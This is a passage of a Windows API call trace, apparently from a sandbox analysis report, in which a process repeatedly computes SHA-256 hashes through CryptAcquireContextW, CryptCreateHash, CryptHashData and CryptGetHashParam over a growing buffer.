	[0225.072] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a260, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a260, pdwDataLen=0x128ba4) returned 1
	[0225.072] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.072] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.072] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.072] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.072] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0225.072] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a288
	[0225.072] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a288, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a288, pdwDataLen=0x128ba4) returned 1
	[0225.072] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.072] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.072] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.073] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.073] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0225.073] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a2b0
	[0225.073] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a2b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a2b0, pdwDataLen=0x128ba4) returned 1
	[0225.073] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.073] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.073] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.073] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.073] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0225.073] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a2d8
	[0225.073] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a2d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a2d8, pdwDataLen=0x128ba4) returned 1
	[0225.073] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.073] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.073] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.074] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.074] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0225.074] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a300
	[0225.074] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a300, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a300, pdwDataLen=0x128ba4) returned 1
	[0225.074] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.074] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.074] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.074] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.074] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0225.074] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a328
	[0225.074] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a328, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a328, pdwDataLen=0x128ba4) returned 1
	[0225.074] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.074] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.074] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.075] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.075] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0225.075] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a350
	[0225.075] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a350, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a350, pdwDataLen=0x128ba4) returned 1
	[0225.075] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.075] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.075] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.075] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.075] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0225.075] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a378
	[0225.075] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a378, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a378, pdwDataLen=0x128ba4) returned 1
	[0225.075] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.075] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.075] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.076] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.076] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0225.076] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a3a0
	[0225.076] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a3a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a3a0, pdwDataLen=0x128ba4) returned 1
	[0225.076] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.076] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.076] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.076] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.076] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0225.076] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a3c8
	[0225.076] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a3c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a3c8, pdwDataLen=0x128ba4) returned 1
	[0225.076] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.076] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.076] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.077] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.077] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0225.077] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a3f0
	[0225.077] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a3f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a3f0, pdwDataLen=0x128ba4) returned 1
	[0225.077] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.077] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.077] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.078] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.078] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0225.078] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a418
	[0225.078] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a418, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a418, pdwDataLen=0x128ba4) returned 1
	[0225.078] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.078] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.078] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.079] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.079] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0225.079] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a440
	[0225.079] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a440, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a440, pdwDataLen=0x128ba4) returned 1
	[0225.079] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.079] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.079] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.079] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.079] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0225.079] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a468
	[0225.079] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a468, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a468, pdwDataLen=0x128ba4) returned 1
	[0225.079] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.079] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.079] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.080] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.080] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0225.080] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a490
	[0225.080] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a490, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a490, pdwDataLen=0x128ba4) returned 1
	[0225.080] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.080] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.080] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.080] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.080] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0225.080] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a4b8
	[0225.080] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a4b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a4b8, pdwDataLen=0x128ba4) returned 1
	[0225.080] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.080] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.080] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.081] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.081] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0225.081] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a4e0
	[0225.081] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a4e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a4e0, pdwDataLen=0x128ba4) returned 1
	[0225.081] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.081] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.081] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.081] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.081] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0225.081] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a508
	[0225.081] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a508, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a508, pdwDataLen=0x128ba4) returned 1
	[0225.081] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.081] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.081] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.082] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.082] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0225.082] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a530
	[0225.082] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a530, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a530, pdwDataLen=0x128ba4) returned 1
	[0225.082] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.082] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.082] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.082] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.082] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0225.082] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a558
	[0225.082] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a558, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a558, pdwDataLen=0x128ba4) returned 1
	[0225.082] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.082] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.082] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.083] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.083] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0225.083] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a580
	[0225.083] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a580, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a580, pdwDataLen=0x128ba4) returned 1
	[0225.083] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.083] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.083] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.083] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.083] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0225.083] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a5a8
	[0225.083] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a5a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a5a8, pdwDataLen=0x128ba4) returned 1
	[0225.083] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.083] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.083] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.084] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.084] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0225.084] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a5d0
	[0225.084] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a5d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a5d0, pdwDataLen=0x128ba4) returned 1
	[0225.084] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.084] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.084] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.084] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.084] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0225.084] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a5f8
	[0225.084] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a5f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a5f8, pdwDataLen=0x128ba4) returned 1
	[0225.084] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.084] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.084] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.085] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.085] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0225.085] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a620
	[0225.085] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a620, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a620, pdwDataLen=0x128ba4) returned 1
	[0225.085] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.085] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.085] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.085] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.085] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0225.085] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a648
	[0225.085] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a648, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a648, pdwDataLen=0x128ba4) returned 1
	[0225.085] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.085] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
